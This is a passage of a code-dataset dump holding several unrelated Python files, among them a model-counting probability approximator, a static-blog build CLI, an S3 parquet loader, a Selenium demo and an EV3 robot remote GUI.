2**k:\n converged = True\n break\n end_gen = time.time()\n partitions.add(assignment_str)\n # write the partition to file\n write_partition(partition_vars, filename, i, bin_string = assignment_str)\n info = os.popen(\"./../../maxcount/scalmc --pivotAC \" + str(pivotAC_partition) + \" --delta \" + str(delta_partition) + \" \" + filename.split('.cnf')[0] + \"-window-\" + str(i) + \".cnf\").readlines()[-1]\n # info = os.popen(\"./../../maxcount/scalmc --pivotAC \" + str(pivotAC_partition) + \" --delta \" + str(delta) + \" \" + filename.split('.cnf')[0] + \"-window-\" + str(i) + \".cnf\").readlines()[-1]\n # info = os.popen(\"./../../maxcount/scalmc \" + filename.split('.cnf')[0] + \"-window-\" + str(i) + \".cnf\").readlines()[-1]\n partitions_sampled += 1\n try:\n # if this partition is satisfiable...\n num_sols = info.split(': ')[1].split(' x ')\n base, exp = int(num_sols[1].split('^')[0]), int(num_sols[1].split('^')[1].strip(\"\\n\"))\n density_sum += float(int(num_sols[0]) * (base**exp))/(2**(n-k))\n density = density_sum/partitions_sampled\n empty_counter = 0\n\n #if the density does not change by more than convergence_limit\n if abs(density - old_density) <= convergence_limit:\n density_counter += 1\n if density_counter >= max(int(threshold/(2**(level-1))), 4):\n # GO TO THE ELSE CASE IF AND ONLY IF our density is 1 but we have sampled unSAT assignments when generating partitioning variables...\n if (not allOne and density != 1) or (allOne and density == 1):\n converged = True\n else:\n free_vars = int(free_vars * 2)\n k = n - free_vars\n density_counter = 0\n threshold = int(threshold / 2)\n if 
k <= 0 or threshold <= 1:\n converged = True\n density = 0\n density_sum = 0\n partition_vars = variable_order[:k]\n partitions = set()\n else:\n density_counter = 0\n except: \n # if the partition is unSAT\n empty_counter += 1\n density = density_sum/partitions_sampled\n if abs(density - old_density) > convergence_limit:\n density_counter = 0\n # print(density)\n total_files += 1\n i += 1\n end = time.time()\n partition_time = end - start\n partition_count = density * 2**n\n i = 0\n # while int(partition_count) % (2**(i+1)) == 0:\n # i += 1\n\n partition_count_str = str(int(partition_count)/(2**i)) + \" x 2^\" + str(i)\n print(\"************************************************\")\n print(\"Time for partitioned with partitioning overhead : {}\".format(partition_time + file_gen_time))\n if not args.ignore_original and not args.ignore_partition:\n print(\"Time for original: \" + str(original_time))\n print(\"Partitioned Probability: \" + str(density))\n if not args.ignore_original and not args.ignore_partition:\n print(\"Original Probability: \" + str(float(original_count)/(2**n)))\n print(\"Percent Error: \" + str(100*abs((density - float(original_count)/(2**n))/(float(original_count)/(2**n)))))\n print(\"************************************************\")\n\n # partition_count_str = str(int(partition_count)/(2**i)) + \" x 2^\" + str(i)\n # print(\"************************************************\")\n # print(\"Convergence Limit: \" + str(convergence_limit))\n # print(\"Iterations to Convergence - Threshold: \" + str(args.threshold))\n # print(\"Partitioned Probability: \" + str(density))\n # print(\"Time for partitioned with partitioning overhead : {}\".format(partition_time + file_gen_time))\n # print(\"Time for partitioned without partitioning overhead: {}\".format(partition_time))\n # print(\"Time taken for final k value: \" + str(end - final_start_time))\n # if not args.ignore_original and not args.ignore_partition:\n # print(\"Original Probability: \" + str(float(original_count)/(2**n)))\n # print(\"Time for original: \" + str(original_time))\n # print(\"Percent Error: \" + str(100*abs((density - float(original_count)/(2**n))/(float(original_count)/(2**n)))))\n # print(\"Number of partitions sampled: {}\".format(total_files))\n # print(\"Final # of partitioning variables (k): \" + str(k))\n # print(\"Number of partitions sampled with k = \" + str(k) + \": \" + str(partitions_sampled))\n # print(\"************************************************\")\n # print(\"Partitioned Count: \" + partition_count_str)\n\n# if args.actual_probability == -1:\n# prob = os.popen(\"aigcount \" + aiger_file + \"out.aag\").readlines()[0][:-2]\n# else:\n# prob = args.actual_probability\n# print(\"Actual Probability: \" + str(float(prob)))\n\n# if aiger:\n# os.system(\"./../aiger-1.9.9/aigand \" + aiger_file + \".aig \" + aiger_file + \".aig\")\n# os.system(\"./../aiger-1.9.9/aigtoaig \" + aiger_file + \".aig \" + aiger_file + \".aag\")\n# os.system(\"aigcompose \" + aiger_file + \".aag \" + \"tests/raw_files/source.aag \" + aiger_file + \".aag\")\n# prob = os.system(\"aigcount \" + aiger_file + \".aag\").readlines()\n# print(\"Actual Probability: \" + str(prob))\n","sub_path":"PSMC_backup/prob_approximator_cnf_direct.py","file_name":"prob_approximator_cnf_direct.py","file_ext":"py","file_size_in_byte":14110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"264957231","text":"# -*- coding: utf-8 -*-\n#!/usr/bin/env python\n# coding: utf-8\n\nimport 
json\nimport collections as cl\nimport sys\nimport datetime\n\ndef store(sentence, score, CM, word, k, count, Time):\n \"\"\"\n sentence : recognized text of each hypothesis (one sentence per string)\n score : likelihood of the hypothesis\n CM : per-word confidence measures\n word : per-word strings\n \"\"\"\n\n\n sentence_list = [\"sentence1\", \"sentence2\", \"sentence3\", \"sentence4\", \"sentence5\", \"sentence6\", \"sentence7\", \"sentence8\", \"sentence9\", \"sentence10\"]\n\n '''store the data'''\n ys = cl.OrderedDict()# OrderedDict so the data keeps insertion order\n for i in range(len(sentence_list)):\n data = cl.OrderedDict()# OrderedDict so the data keeps insertion order\n data[\"sentence\"] = sentence[i]\n data[\"score\"] = score[i]\n data[\"word\"] = word[i]\n data[\"CM\"] = CM[i]\n\n\n ys[sentence_list[i]] = data # dictionary-type data\n\n\n ys.update(Time)\n fs = open('./'+k+'_speech/'+k+'_'+str(count)+'_sentence.json','w')\n #fl = open(k+'sentence_log.json', 'a+')\n\n json.dump(ys,fs,indent=4,ensure_ascii=False)\n #json.dump(ys,fl,indent=4,ensure_ascii=False)\n return ys\n # without indent the whole JSON would be written on one line (hard to read)\n # ensure_ascii=False avoids mojibake when writing non-ASCII text to JSON\n","sub_path":"julius_rec_store.py","file_name":"julius_rec_store.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"574872574","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.select import Select\n\n\n# Driver Initialization\ndriver=webdriver.Chrome(executable_path=\"D:\\SeleniumPython\\drivers\\chromedriver.exe\")\ndriver.maximize_window()\n\n\ndriver.get(\"http://demo.automationtesting.in/Register.html\") # Launch Browser\n\n\nele=driver.find_element(By.ID,\"Skills\")\ndrp=Select(ele)\n\n#drp=Select(driver.find_element_by_id(\"Skills\"))\n\n#Select one option\n\n#Select by Visible Text\n#drp.select_by_visible_text(\"Adobe Photoshop\")\n\n# #Select by Index\n#drp.select_by_index(1)\n\n#Select by Value\n#drp.select_by_value(\"Backup Management\")\n\n\n#Count no of options present\nprint(len(drp.options))\n\n#Capture Options from dropdown\nall_options=drp.options\n\nfor option in all_options:\n print(option.text)\n\n\n# a=0\n# for option in all_options:\n# print(option.text)\n# if option.text==\"Windows1\":\n# a=1\n# break\n#\n# if a==1:\n# print(\"pass\")\n# else:\n# print(\"fail\")\n\ndriver.quit()\n\n","sub_path":"SeleniumPython/DropDown.py","file_name":"DropDown.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"251297664","text":"import tempfile\nimport unittest\n\nfrom counter import count_file_lines\n\n\nclass TestCountFileLines(unittest.TestCase):\n def test_count(self):\n with tempfile.NamedTemporaryFile(mode='w') as f:\n f.write(\"\"\"one\ntwo\nthree\nfour\n\"\"\")\n f.flush()\n actual = count_file_lines(f.name)\n self.assertEqual(actual, 4)\n","sub_path":"PyQ/unit_test/39_3/tests/test_counter.py","file_name":"test_counter.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"39328791","text":"from s3fs import S3FileSystem\nfrom fastparquet import ParquetFile\nfrom pandas import DataFrame\n\n\ndef connect(key: str, secret: str) -> S3FileSystem:\n \"\"\"Create an s3fs filesystem handle for the S3 service.\"\"\"\n filesystem = S3FileSystem(key=key, secret=secret)\n return filesystem\n\n\ndef list_files(filesystem: S3FileSystem, bucket: str, s3_uri: str) -> list:\n \"\"\"List files on S3 bucket on given URI.\"\"\"\n # Remove leading and trailing \"/\"\n s3_uri = s3_uri.strip('/')\n # Find all files on s3_uri in bucket\n paths = filesystem.glob(f'{bucket}/{s3_uri}/*.parquet')\n\n if paths:\n return paths\n\n raise FileNotFoundError(\n f'Bucket {bucket} contains no files matching \"{s3_uri}\" URI'\n )\n\n\ndef fetch(filesystem: S3FileSystem, bucket: str, s3_uri: str) -> DataFrame:\n \"\"\"Collect a file from S3 URI.\"\"\"\n paths = list_files(filesystem, bucket, s3_uri)\n parquet = ParquetFile(paths, open_with=filesystem.open)\n\n return parquet.to_pandas()\n","sub_path":"s3/s3.py","file_name":"s3.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"586257702","text":"import yt\n\nyt.enable_parallelism()\n\nidx_start = 0\nidx_end = 50\ndidx = 1\nprefix = 'Data_'\n\nts = yt.load( [ prefix+'%06d'%idx for idx in range(idx_start, idx_end+1, didx) ] )\n\nfor ds in ts.piter():\n\n pz_dens = yt.ProjectionPlot( ds, 'z', 'density' )\n pz_dens.set_zlim( 'density', 1.0e-5, 5.0e-2 )\n pz_dens.set_font( {'size':16} )\n pz_dens.annotate_timestamp( corner='upper_right' )\n pz_dens.save()\n\n pz_Cloud0 = yt.ProjectionPlot( ds, 'z', 'Cloud0' )\n pz_Cloud0.set_zlim( 'Cloud0', 1.0e-5, 5.0e-2 )\n pz_Cloud0.set_font( {'size':16} )\n pz_Cloud0.annotate_timestamp( corner='upper_right' )\n pz_Cloud0.save()\n\n pz_Cloud1 = yt.ProjectionPlot( ds, 'z', 'Cloud1' )\n pz_Cloud1.set_zlim( 'Cloud1', 1.0e-5, 5.0e-2 )\n pz_Cloud1.set_font( {'size':16} )\n pz_Cloud1.annotate_timestamp( corner='upper_right' )\n 
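# save() with no argument uses yt's default output name\n # (dataset_Projection_axis_field.png), presumably something like\n # Data_000000_Projection_z_Cloud1.png for these datasets\n 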
pz_Cloud1.save()\n","sub_path":"test_problem_deprecated/Model_ParticleOnly/Plummer/plot_density.py","file_name":"plot_density.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"586257702","text":"import os\r\nimport argparse\r\nimport fiona\r\n\r\nprogfiles = os.listdir(\"C:\\\\Program Files\")\r\nqgis = \"\\\"C:\\\\Program Files\\\\\"+[s for s in progfiles if \"QGIS\" in s][0]+\"\\\\OSGeo4W.bat\\\"\"\r\n\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument(\"--img\", help=\"path of input positive images\")\r\nparser.add_argument(\"--shp\", help=\"path of output in shapefile\")\r\nparser.add_argument(\"--out\", help=\"directory path of cropped output images\")\r\narg = parser.parse_args()\r\n\r\nimg = arg.img\r\nshp = arg.shp\r\nout = arg.out\r\n\r\nfs = fiona.open(shp)\r\nb=1\r\nfor a in fs:\r\n print(a)\r\n imgout = out+\"\\\\\"+str(b)+\".tif\"\r\n coord = a['geometry']['coordinates']\r\n x1, y1 = coord[0][3]\r\n x2, y2 = coord[0][1]\r\n if(x1>x2): ulx=x2; lrx=x1\r\n else: ulx=x1; lrx=x2\r\n if(y1>y2): uly=y1; lry=y2\r\n else: uly=y2; lry=y1\r\n cmd = qgis+\" gdal_translate -of GTiff -projwin \"+str(ulx)+\" \"+str(uly)+\" \"+str(lrx)+\" \"+str(lry)+\" \"+img+\" \"+imgout\r\n print(cmd)\r\n os.system(cmd)\r\n b+=1\r\n","sub_path":"croping_img_from_shp.py","file_name":"croping_img_from_shp.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"256684571","text":"import os\nimport re\nimport shutil\nimport functools\nimport traceback\nfrom urllib.parse import urlparse\n\nimport click\nfrom flask import url_for\n\nfrom .__meta__ import __version__\nfrom . 
import (\n app,\n root_folder,\n static_folder,\n theme_static_folder,\n pages_folder,\n posts_folder,\n raw_folder,\n load_posts,\n)\n\n\necho = click.echo\necho_green = functools.partial(click.secho, fg=\"green\")\necho_blue = functools.partial(click.secho, fg=\"blue\")\necho_red = functools.partial(click.secho, fg=\"red\")\necho_yellow = functools.partial(click.secho, fg=\"yellow\")\n\n\n@click.group(name=\"purepress\", short_help=\"A simple static blog generator.\")\n@click.version_option(version=__version__)\ndef cli():\n pass\n\n\nDEFAULT_PUREPRESS_TOML = \"\"\"\\\n[site]\ntitle = \"My Blog\"\nsubtitle = \"Here is my blog\"\nauthor = \"My Name\"\ntimezone = \"Asia/Shanghai\"\n\n[config]\nposts_per_index_page = 5\n\"\"\"\n\nDEFAULT_POST_TEMPLATE = \"\"\"\\\n---\ntitle: A demo {0}\n---\n\nThis is a demo {0}.\n\"\"\"\n\n\n@cli.command(\"init\", short_help=\"Initialize an instance.\")\ndef init_command():\n if os.listdir(root_folder):\n echo_red(f'The instance folder \"{root_folder}\" is not empty')\n exit(1)\n echo(\"Creating folders...\", nl=False)\n os.makedirs(posts_folder, exist_ok=True)\n os.makedirs(pages_folder, exist_ok=True)\n os.makedirs(static_folder, exist_ok=True)\n os.makedirs(raw_folder, exist_ok=True)\n echo_green(\"OK\")\n echo(\"Creating default purepress.toml...\", nl=False)\n with open(\n os.path.join(root_folder, \"purepress.toml\"), mode=\"w\", encoding=\"utf-8\"\n ) as f:\n f.write(DEFAULT_PUREPRESS_TOML)\n echo_green(\"OK\")\n echo(\"Creating demo page...\", nl=False)\n with open(os.path.join(pages_folder, \"demo.md\"), mode=\"w\", encoding=\"utf-8\") as f:\n f.write(DEFAULT_POST_TEMPLATE.format(\"page\"))\n echo_green(\"OK\")\n echo(\"Creating demo post...\", nl=False)\n with open(\n os.path.join(posts_folder, \"1970-01-01-demo.md\"), mode=\"w\", encoding=\"utf-8\"\n ) as f:\n f.write(DEFAULT_POST_TEMPLATE.format(\"post\"))\n echo_green(\"OK\")\n echo_green(\"OK! Now you can install a theme and preview the site.\")\n\n\n@cli.command(\"preview\", short_help=\"Preview the site.\")\n@click.option(\"--host\", \"-h\", default=\"127.0.0.1\", help=\"Host to preview the site.\")\n@click.option(\"--port\", \"-p\", default=8080, help=\"Port to preview the site.\")\n@click.option(\"--debug\", is_flag=True, default=False, help=\"Preview in debug mode.\")\ndef preview_command(host, port, debug):\n app.debug = debug\n app.config[\"TEMPLATES_AUTO_RELOAD\"] = True\n app.run(host=host, port=port, debug=debug)\n\n\n@cli.command(\"build\", short_help=\"Build the site.\")\n@click.option(\n \"--url-root\",\n prompt=\"Please enter the url root (used as prefix of generated url)\",\n help=\"The url root of your site. For example, if you want to access the site \"\n 'through \"http://example.com/blog/\", \"http://example.com/blog/\" should be '\n \"passed in as the url root.\",\n)\ndef build_command(url_root):\n res = urlparse(url_root)\n app.config[\"PREFERRED_URL_SCHEME\"] = res.scheme\n app.config[\"SERVER_NAME\"] = res.netloc\n app.config[\"APPLICATION_ROOT\"] = res.path or \"/\"\n # mark as 'BUILDING' status, so that templates can react properly.\n app.config[\"BUILDING\"] = True\n\n try:\n with app.test_client() as client:\n build(client)\n echo_green('OK! 
Now you can find the built site in the \"build\" folder.')\n except Exception:\n traceback.print_exc()\n echo_red(\"Failed to build the site.\")\n exit(1)\n\n\ndef build(client):\n # prepare folder paths\n build_folder = os.path.join(root_folder, \"build\")\n build_static_folder = os.path.join(build_folder, \"static\")\n build_static_theme_folder = os.path.join(build_static_folder, \"theme\")\n build_pages_folder = build_folder\n build_posts_folder = os.path.join(build_folder, \"post\")\n build_categories_folder = os.path.join(build_folder, \"category\")\n build_tags_folder = os.path.join(build_folder, \"tag\")\n build_archive_folder = os.path.join(build_folder, \"archive\")\n build_index_page_folder = os.path.join(build_folder, \"page\")\n\n echo(\"Creating build folder...\", nl=False)\n if os.path.isdir(build_folder):\n shutil.rmtree(build_folder)\n elif os.path.exists(build_folder):\n os.remove(build_folder)\n os.mkdir(build_folder)\n echo_green(\"OK\")\n\n echo(\"Copying raw files...\", nl=False)\n copy_folder_content(raw_folder, build_folder)\n echo_green(\"OK\")\n\n echo(\"Copying theme static files...\", nl=False)\n os.makedirs(build_static_theme_folder, exist_ok=True)\n copy_folder_content(theme_static_folder, build_static_theme_folder)\n echo_green(\"OK\")\n\n echo(\"Copying static files...\", nl=False)\n copy_folder_content(static_folder, build_static_folder)\n echo_green(\"OK\")\n\n echo(\"Building custom pages...\", nl=False)\n for dirname, _, files in os.walk(pages_folder):\n rel_dirname = os.path.relpath(dirname, pages_folder)\n os.makedirs(os.path.join(build_pages_folder, rel_dirname), exist_ok=True)\n for file in files:\n rel_path = os.path.join(rel_dirname, file)\n dst_rel_path = re.sub(r\".md$\", \".html\", rel_path)\n dst_path = os.path.join(build_pages_folder, dst_rel_path)\n rel_url = \"/\".join(os.path.split(dst_rel_path))\n with app.test_request_context():\n url = url_for(\"page\", rel_url=rel_url)\n res = client.get(url)\n with open(dst_path, \"wb\") as f:\n f.write(res.data)\n echo_green(\"OK\")\n\n with app.test_request_context():\n posts = load_posts(meta_only=True)\n\n echo(\"Building posts...\", nl=False)\n for post in posts:\n filename = post[\"filename\"]\n year, month, day, name = os.path.splitext(filename)[0].split(\"-\", maxsplit=3)\n dst_dirname = os.path.join(build_posts_folder, year, month, day, name)\n os.makedirs(dst_dirname, exist_ok=True)\n dst_path = os.path.join(dst_dirname, \"index.html\")\n with app.test_request_context():\n url = url_for(\"post\", year=year, month=month, day=day, name=name)\n res = client.get(url)\n with open(dst_path, \"wb\") as f:\n f.write(res.data)\n echo_green(\"OK\")\n\n echo(\"Building categories...\", nl=False)\n categories = set(\n functools.reduce(lambda c, p: c + p.get(\"categories\", []), posts, [])\n )\n for category in categories:\n category_folder = os.path.join(build_categories_folder, category)\n os.makedirs(category_folder, exist_ok=True)\n with app.test_request_context():\n url = url_for(\"category\", name=category)\n res = client.get(url)\n with open(os.path.join(category_folder, \"index.html\"), \"wb\") as f:\n f.write(res.data)\n echo_green(\"OK\")\n\n echo(\"Building tags...\", nl=False)\n tags = set(functools.reduce(lambda t, p: t + p.get(\"tags\", []), posts, []))\n for tag in tags:\n tag_folder = os.path.join(build_tags_folder, tag)\n os.makedirs(tag_folder, exist_ok=True)\n with app.test_request_context():\n url = url_for(\"tag\", name=tag)\n res = client.get(url)\n with open(os.path.join(tag_folder, 
\"index.html\"), \"wb\") as f:\n f.write(res.data)\n echo_green(\"OK\")\n\n echo(\"Building archive...\", nl=False)\n os.makedirs(build_archive_folder, exist_ok=True)\n with app.test_request_context():\n url = url_for(\"archive\")\n res = client.get(url)\n with open(os.path.join(build_archive_folder, \"index.html\"), \"wb\") as f:\n f.write(res.data)\n echo_green(\"OK\")\n\n echo(\"Building index...\", nl=False)\n with app.test_request_context():\n url = url_for(\"index\")\n res = client.get(url)\n with open(os.path.join(build_folder, \"index.html\"), \"wb\") as f:\n f.write(res.data)\n page_num = 2\n while res.status_code != 404:\n page_folder = os.path.join(build_index_page_folder, str(page_num))\n os.makedirs(page_folder, exist_ok=True)\n with app.test_request_context():\n url = url_for(\"index_page\", page_num=page_num)\n res = client.get(url)\n with open(os.path.join(page_folder, \"index.html\"), \"wb\") as f:\n f.write(res.data)\n page_num += 1\n echo_green(\"OK\")\n\n echo(\"Building feed...\", nl=False)\n with app.test_request_context():\n url = url_for(\"feed\")\n res = client.get(url)\n with open(os.path.join(build_folder, \"feed.atom\"), \"wb\") as f:\n f.write(res.data)\n echo_green(\"OK\")\n\n echo(\"Building 404...\", nl=False)\n with app.test_request_context():\n url = url_for(\"page_not_found\")\n res = client.get(url)\n with open(os.path.join(build_folder, \"404.html\"), \"wb\") as f:\n f.write(res.data)\n echo_green(\"OK\")\n\n\ndef copy_folder_content(src, dst):\n \"\"\"\n Copy all content in src directory to dst directory.\n The src and dst must exist.\n \"\"\"\n for file in os.listdir(src):\n file_path = os.path.join(src, file)\n dst_file_path = os.path.join(dst, file)\n if os.path.isdir(file_path):\n shutil.copytree(file_path, dst_file_path)\n else:\n shutil.copy(file_path, dst_file_path)\n\n\ndef main():\n cli.main()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"purepress/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":9299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"205104648","text":"\n\nimport tkinter\nfrom tkinter import ttk\n\nimport mqtt_remote_method_calls as com\n\nfrom tkinter import *\n\n\ndef main():\n find_and_go_to_color()\n\n\ndef find_and_go_to_color():\n left_speed = 600\n right_speed = 600\n mqtt_client = com.MqttClient()\n mqtt_client.connect_to_ev3()\n\n root = tkinter.Tk()\n root.title(\"MQTT Remote\")\n\n main_frame = ttk.Frame(root, padding=60, relief='raised')\n main_frame.grid()\n\n other_color_label_entry1 = ttk.Entry(main_frame, width=8)\n other_color_label_entry1.grid(row=1, column=4)\n other_color_button = ttk.Button(main_frame, text='Enter Other Color')\n other_color_button.grid(row=2, column=4)\n other_color_button['command'] = lambda: drive_to_color(mqtt_client, other_color_label_entry1)\n\n color_label_entry = ttk.Entry(main_frame, width=8)\n color_label_entry.grid(row=1, column=0)\n color_button = ttk.Button(main_frame, text=\"Enter Color\")\n color_button.grid(row=2, column=0)\n color_button['command'] = lambda: seek_color(mqtt_client, color_label_entry)\n\n label_color = Message(main_frame, text='Choose this entry box to pick up a color', justify=CENTER)\n label_color.grid(row=0, column=0)\n\n label_color_other = Message(main_frame, text='Choose this entry box to drive to a \\n color', justify=CENTER)\n label_color_other.grid(row=0, column=4)\n\n info_label = Message(main_frame, text='Be careful to only enter colors on the Pixy 
Camera', justify=CENTER)\n info_label.grid(row=0, column=2)\n\n forward_button = ttk.Button(main_frame, text=\"Forward\")\n forward_button.grid(row=2, column=2)\n forward_button['command'] = lambda: drive_forward(mqtt_client, right_speed,\n left_speed)\n root.bind('',\n lambda event: drive_forward(mqtt_client, right_speed, left_speed))\n\n left_button = ttk.Button(main_frame, text=\"Left\")\n left_button.grid(row=3, column=1)\n\n left_button['command'] = lambda: drive_left(mqtt_client, right_speed, left_speed)\n root.bind('',\n lambda event: drive_left(mqtt_client, right_speed, left_speed))\n\n stop_button = ttk.Button(main_frame, text=\"Stop\")\n stop_button.grid(row=3, column=2)\n stop_button['command'] = lambda: stop(mqtt_client)\n root.bind('', lambda event: stop(mqtt_client))\n\n right_button = ttk.Button(main_frame, text=\"Right\")\n right_button.grid(row=3, column=3)\n right_button['command'] = lambda: drive_right(mqtt_client, right_speed, left_speed)\n root.bind('',\n lambda event: drive_right(mqtt_client, right_speed, left_speed))\n\n back_button = ttk.Button(main_frame, text=\"Back\")\n back_button.grid(row=4, column=2)\n back_button['command'] = lambda: drive_backward(mqtt_client, right_speed, left_speed)\n root.bind('',\n lambda event: drive_backward(mqtt_client, right_speed, left_speed))\n\n up_button = ttk.Button(main_frame, text=\"Grab\")\n up_button.grid(row=5, column=1)\n up_button['command'] = lambda: send_up(mqtt_client)\n root.bind('', lambda event: send_up(mqtt_client))\n\n down_button = ttk.Button(main_frame, text=\"Lower\")\n down_button.grid(row=6, column=1)\n down_button['command'] = lambda: send_down(mqtt_client)\n root.bind('', lambda event: send_down(mqtt_client))\n\n q_button = ttk.Button(main_frame, text=\"Quit\")\n q_button.grid(row=5, column=3)\n q_button['command'] = (lambda: quit_program(mqtt_client, False))\n\n e_button = ttk.Button(main_frame, text=\"Exit\")\n e_button.grid(row=6, column=3)\n e_button['command'] = (lambda: quit_program(mqtt_client, True))\n\n root.mainloop()\n\n\ndef drive_forward(mqtt_client, right_speed, left_speed):\n print('drive_forward')\n mqtt_client.send_message('drive_forward', [right_speed, left_speed])\n\n\ndef drive_backward(mqtt_client, right_speed, left_speed):\n print('drive_backward')\n mqtt_client.send_message('drive_backward', [right_speed, left_speed])\n\n\ndef drive_left(mqtt_client, right_speed, left_speed):\n print('drive_left')\n mqtt_client.send_message('drive_left', [right_speed-200, left_speed-200])\n\n\ndef drive_right(mqtt_client, right_speed, left_speed):\n print('drive_right')\n mqtt_client.send_message('drive_right', [right_speed-200, left_speed-200])\n\n\ndef stop(mqtt_client):\n print('stop')\n mqtt_client.send_message('stop')\n\n\ndef send_up(mqtt_client):\n print(\"arm_up\")\n mqtt_client.send_message(\"arm_up\")\n\n\ndef send_down(mqtt_client):\n print(\"arm_down\")\n mqtt_client.send_message(\"arm_down\")\n\n\ndef quit_program(mqtt_client, shutdown_ev3):\n if shutdown_ev3:\n print(\"shutdown\")\n mqtt_client.send_message(\"shutdown\")\n mqtt_client.close()\n exit()\n\n\ndef seek_color(mqtt_client, color):\n print(\"finding color\")\n mqtt_client.send_message('choose_pixy_mode', [color.get()])\n\n\ndef drive_to_color(mqtt_client, other_color_entry1):\n print('driving to color')\n mqtt_client.send_message('pixy_mode_for_drive', [other_color_entry1.get()])\nmain()\n","sub_path":"projects/strozian/Project for Pc.py","file_name":"Project for 
Pc.py","file_ext":"py","file_size_in_byte":5043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"251297664","text":"import tempfile\nimport unittest\n\nfrom counter import count_file_lines\n\n\nclass TestCountFileLines(unittest.TestCase):\n def test_count(self):\n with tempfile.NamedTemporaryFile(mode='w') as f:\n f.write(\"\"\"one\ntwo\nthree\nfour\n\"\"\")\n f.flush()\n actual = count_file_lines(f.name)\n self.assertEqual(actual, 4)\n","sub_path":"PyQ/unit_test/39_3/tests/test_counter.py","file_name":"test_counter.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"39328791","text":"from s3fs import S3FileSystem\nfrom fastparquet import ParquetFile\nfrom pandas import DataFrame\n\n\ndef connect(key: str, secret: str) -> S3FileSystem:\n \"\"\"Create a Boto3 client for S3 service.\"\"\"\n filesystem = S3FileSystem(key=key, secret=secret)\n return filesystem\n\n\ndef list_files(filesystem: S3FileSystem, bucket: str, s3_uri: str) -> list:\n \"\"\"List files on S3 bucket on given URI.\"\"\"\n # Remove leading and trailing \"/\"\n s3_uri = s3_uri.strip('/')\n # Find all files on s3_uri in bucket\n paths = filesystem.glob(f'{bucket}/{s3_uri}/*.parquet')\n\n if paths:\n return paths\n\n raise FileExistsError(\n f'Bucket {bucket} contains no files matching \"{s3_uri}\" URI'\n )\n\n\ndef fetch(filesystem: S3FileSystem, bucket: str, s3_uri: str) -> DataFrame:\n \"\"\"Collect a file from S3 URI.\"\"\"\n paths = list_files(filesystem, bucket, s3_uri)\n parquet = ParquetFile(paths, open_with=filesystem.open)\n\n return parquet.to_pandas()\n","sub_path":"s3/s3.py","file_name":"s3.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"556436924","text":"from AModels.Producto import Producto\nfrom AModels.Categoria import Categoria\nfrom DHelpers.validacion import validacion\nfrom DHelpers.menu import Menu\n\n\nclass ControllerProducto:\n def __init__(self,tipo_empleado):\n self.productos = Producto()\n self.categorias = Categoria()\n self.salir = False\n self.validar = validacion()\n self.tipo_empleado=tipo_empleado\n def menu(self):\n try:\n while True:\n if(self.tipo_empleado==-1):\n print('''\n ==================\n Menu Producto\n ==================\n ''')\n lista_menu = [\"Mostrar Producto\", \"Salir\"]\n respuesta = Menu(lista_menu).show()\n\n if respuesta == 1:\n self.show_producto()\n else:\n self.salir = True\n break\n if(self.tipo_empleado!=-1):\n print('''\n ==================\n Menu Producto\n ==================\n ''')\n lista_menu = [\"Crear Producto\", \"Mostrar Producto\", \"Buscar Producto\", \"Salir\"]\n respuesta = Menu(lista_menu).show()\n\n if respuesta == 1:\n self.insert_producto()\n elif respuesta == 2:\n self.show_producto()\n elif respuesta == 3:\n self.search_producto()\n else:\n self.salir = True\n break\n except Exception as e:\n print(f'{str(e)}')\n\n def insert_producto(self):\n print('''\n ====================\n CREAR PRODUCTO\n ====================\n ''')\n while True:\n Nombre_producto = self.validar.valiar_ingreso_texto(\"Ingrese el nombre del producto\")\n if self.validar.validar_existencia_campo_valor_producto('nombres_producto',Nombre_producto):\n print('El producto ingresado ya existe, ingrese otro producto')\n else:\n break\n \n categ_id=\"\"\n while True:\n nombre_categoria = self.validar.valiar_ingreso_texto(\"Ingrese la 
categoria del producto\")\n if self.validar.validar_existencia_campo_valor_categoria('nombres_categoria',nombre_categoria):\n categ_id=self.validar.validar_existencia_campo_valor_categoria('nombres_categoria',nombre_categoria)['_id']\n break\n else:\n print('La categoria ingresada no existe')\n stock = self.validar.valiar_ingreso_integer(\"Ingrese el stock del producto\")\n precio = self.validar.valiar_ingreso_double(\"Ingrese el precio del producto\") \n data = {\n 'nombres_producto': Nombre_producto,\n 'stock': stock,\n 'precio': precio,\n 'categoria_identificador':categ_id,\n 'categoria': nombre_categoria\n }\n self.productos.insert_producto(data)\n print('''\n =========================\n Producto Creado\n =========================\n ''')\n producto_creado=self.validar.validar_existencia_campo_valor_producto('nombres_producto',Nombre_producto)\n print(self.validar.print_table(producto_creado, ['ID', 'nombres_producto','stock','precio','categoria_identificador','categoria']))\n input('Presiona una tecla para continuar...')\n \n def show_producto(self):\n try:\n print('''\n =====================\n MOSTRAR PRODUCTO\n =====================\n ''')\n condicion = {}\n seleccion = {\n '_id' : 1,\n 'nombres_producto': 1,\n 'stock': 1,\n 'precio': 1,\n 'categoria_identificador': 1,\n 'categoria': 1,\n\n } \n prod = self.productos.get_productos(condicion, seleccion) \n print('''\n =========================\n Productos\n =========================\n 